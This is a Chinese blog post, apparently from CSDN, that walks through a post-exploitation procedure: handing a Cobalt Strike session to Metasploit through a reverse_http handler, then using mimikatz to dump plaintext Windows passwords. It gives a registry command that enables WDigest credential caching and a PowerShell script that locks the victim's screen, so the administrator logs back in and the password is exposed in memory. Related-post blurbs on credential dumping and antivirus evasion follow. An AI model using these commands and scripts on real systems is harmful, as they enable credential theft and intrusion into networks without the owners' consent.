cs给msf传shell+mimikatz读取明文密码

最新推荐文章于 2024-05-31 22:11:23 发布
最新推荐文章于 2024-05-31 22:11:23 发布
阅读量577 收藏 13
点赞数 12
分类专栏: 网安 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vt_yjx/article/details/139127499
版权

目录

cs传递shell给msf

1.msf开启监听:

2.cs添加监听器

mimikatz抓明文密码

cs传递shell给msf

直接进入正题,省去拿shell步骤:

此时cs有一台上线主机:

1.msf开启监听:

use exploit/multi/handler

set payload windows/meterpreter/reverse_http(注:这里是http,与cs上线的监听器一致)

set lhost 本机ip

set lport 自己的端口号

run

2.cs添加监听器

选到foreign http

然后右键点击spawn,对上线主机选择msf这个监听器就好了:

然后就msf这边就上线了:

mimikatz抓明文密码

有一台上线主机,运行mimikatz:

密码是null,是因为官方改的。本来mimikatz是可以抓明文的,mimikatz抓明文原理:

windows输入密码的进程是winlogon.exe

然后输入密码后给到lsass.exe这个进程,这个进程会存储一份明文再内存中

然后ntlmv2加密后发一份给sma文件

mimikatz就抓内存中的明文。

现在方法就两种:

1.

考虑sam文件了,可以dump出来本地破解出明文

2.

修改注册表

上传一个锁屏脚本,管理员重新输入密码后可以抓明文

shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f

然后把这个脚本上传到目标机:

Function Lock-WorkStation {
 
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
 
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
 
$LockWorkStation::LockWorkStation() | Out-Null
 
}
 
Lock-WorkStation

用cs直接上传:

然后执行:

shell powershell -file c:\aaa.ps1

然后上线主机就锁屏了:

正常情况管理员会登录,然后就可以再用mimicatz抓密码,此时就是明文了:

vt_yjx
关注
  • 12
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透Windows密码凭证获取
qq_46258964的博客
06-09 2652
记录一下抓取window凭证信息的一些工具 Windows凭证抓取1,procdump (官方工具无视免杀)(首选) procdump + mimikatz 加载dmp件,并导出其中的密码(procdump过杀软) 2,注册表读取windows hash (首选) 当目标为win10或2012R2以上时,默认在内存缓存中禁止保存密码,但可以通过修改注册表的方式抓取。 注册表读取密码主要获取的是3个件 3,Pwdump 4,mimikatz(名声最大的密码获取工具) 5,MSF MSF框架密
实用csmimikatz免杀virscan
xxx9686的博客
09-17 1902
第一步:替换资源,此步骤可以直接免杀360及电脑管家,但是无法过火绒。使用Restorator加载mimikatz后在拖入其他程序资源(此处需要注意,资源需要无毒,资源越好效果越佳。sigthief.py -i 软件件名 -t 木马件名 -o 输出位置(此处由于软件从虚拟机中考出有问题,无图)。替换版本及图标资源后,需要给软件上数字签名(正儿八经的软件签名我们没有,可以copy别的软件做伪签名)。简单过360,但是资源未过火绒,在此基础上我们给他添加一个壳即可,任意壳,我们添加vm壳。
抓取内网windows密码和利用hash横向及相关问题
vt_yjx的博客
04-20 363
因为mimikatz这个工具是利用了lsass.exe会把一份账号密码存到内存中,所以才能抓到,但是由于系统补丁才抓不到了。不过继续横向不需要密码,因为系统验证都是通过比对hash值的,而哈希值又是不可逆
【渗透测试笔记】之【内网渗透——横向移动:使用mimikatzCS进行哈希递攻击】
AA8j的博客
11-15 3349
章目录1. mimikatz1.1 NTLM Hash递攻击1.2 AES-256 哈希递攻击2. CS2.1 获得一个Beacon2.2 dump Hash2.2.1 方法一2.2.2 方法二2.2.3 查看2.3 哈希递攻击 1. mimikatz 地址:https://github.com/gentilkiwi/mimikatz 1.1 NTLM Hash递攻击 首先获得域管NTLM Hash:【渗透测试笔记】之【内网渗透——横向移动:获取Windows密码与散列值的若干方法和防御手段
内网渗透系列-mimikatz的使用以及后门植入
lza20001103的博客
04-15 1115
内网渗透系列-mimikatz的使用以及后门植入
mimikatz在Win10及2012系统以后的抓取方式
热门推荐
netsec_steven的博客
07-10 1万+
1.procdump+mimikatz获取win10/win2012 R2用户密码 测试环境:win10企业版和win2012 R2 版本 工具下载:链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38 原理:获取到内存件lsass.exe进程(它用于本地安全和登陆策略)中存储的登录密码 利用前提:拿到了admin权限的cmd,管理员用密码登录机器,并运行了lsass.exe进程,把密码保存在内存件lsass进程中。 抓.
csmsf权限递以及mimikatz抓取win2012密码
huizhaohaha的博客
05-25 736
我查找过资料得出,Cobalt Strike 的前身是 Armitage,而 Armitage 又可以理解为 Metasploit Framework 的图形界面版,因此 Cobalt Strike 与 Metasploit Framework 在很多地方都是兼容的,所以我们便可以将 Metasploit Framework 攻击产生的会话递到 Cobalt Strike 上,同样的 Cobalt Strike 的会话也能够递到 Metasploit Framework。
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
[原创]K8 MSF Bind Shell TCP 连接工具-附件资源
03-05
[原创]K8 MSF Bind Shell TCP 连接工具-附件资源
docker-kali-msf:带有 Kali + metasploitmsfconsole + postgresql 的 Docker 镜像
06-24
什么 安装了 metasploit 和 metasploit-framework 的 Kali Linux 基础镜像( 元包)。 换句话说,这是一个单一的 ... docker run -t -i --name testy --rm ctarwater/docker-kali-msf 使用我们的 docker run -t -
csmsf权限递,以及mimikatz抓取win2012密码
最新发布
qq_64395221的博客
05-31 300
环境搭建:攻击IP :10.11.17.22(kali cs服务端、msf所在主机)靶机IP:10.11.73.53(Windows2012)
mimikatz】获取windows平台的用户密码以及解决报错问题记录
weixin_44723534的博客
03-26 6944
一、思路 1.准备虚拟机环境windows7、windows10 2.检查电脑是32位还是64位 3.根据电脑32位/32位下载mimikatz工具 4.提前把电脑杀毒功能关闭 5.支持获取用户密码平台 支持:windows 7、windows server 2008、windows server 2012 不支持:windows10 6.mimikatz工具功能 mimikatz工具直接从lsass.exe进程里获取windows处于active状态账号的密码。 支持提升进程权限、注入进程,读取进程内
内网渗透系列之mimikatz的使用以及后门植入
lza20001103的博客
09-04 4210
内网渗透系列之mimikatz的使用以及后门植入 章目录内网渗透系列之mimikatz的使用以及后门植入前言mimikatz的使用后门植入msf永久后门植入(1)Meterpreter后门:Metsvc(2)Meterpreter后门:PersistenceNC后门后记 前言 内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持
mimikatz获取密码_CS学习笔记 | 18、密码哈希散列设置信任
weixin_39603588的博客
12-05 836
0x00 前言继续上一节密码哈希的部分,在上一节中讲到了使用密码生成用户的令牌,从而取得系统的信任,这一节将介绍使用密码的哈希值来取得系统的信任。0x01 密码哈希首先使用 hashdump 获取用户的密码哈希值,这里的 beacon 会话为 SYSTEM 权限。beacon> hashdump[*] Tasked beacon to dump hashes[+] host cal...
几种姿势运行mimikatz
小晓晓晓林的博客
01-21 4797
Mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取密码和NTLM哈希值的神器,内网渗透中常用mimikatz获取密码或者获取hash值来漫游内网。但是在实际的运用中,常常会遇到杀软的拦截,所以这里我借鉴网上的资料,进行复现学习,达到免杀绕过的目的。有些方式没有复现成功我就没有写出来了,有一些成功之后似乎也会被拦截了。 姿势一:powershell ...
msf升级shell
08-06
根据引用和引用中的信息,要在Metasploit Framework (MSF)中升级shell,可以按照以下步骤进行操作: 1. 首先,确保已经建立了与目标主机的连接,并且已经获取到了一个正常的shell会话。 2. 使用命令sessions -u [会话ID将shell升级为meterpreter shell。这样可以将MSF会话派生到Cobalt Strike (CS)。 3. 接下来,可以将MSF中的会话派生给CS。具体步骤如下: a. 进入到Cobalt Strike的上下中。 b. 使用命令migrate [目标进程ID将shell移动到指定的进程中。例如,可以使用命令migrate448将shell迁移到进程ID为448的进程中。 c. 输入getpid命令来确认shell已经成功迁移到目标进程中。 这样,你就成功地将MSF中的shell升级到了meterpreter shell,并将其派生到了Cobalt Strike会话中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值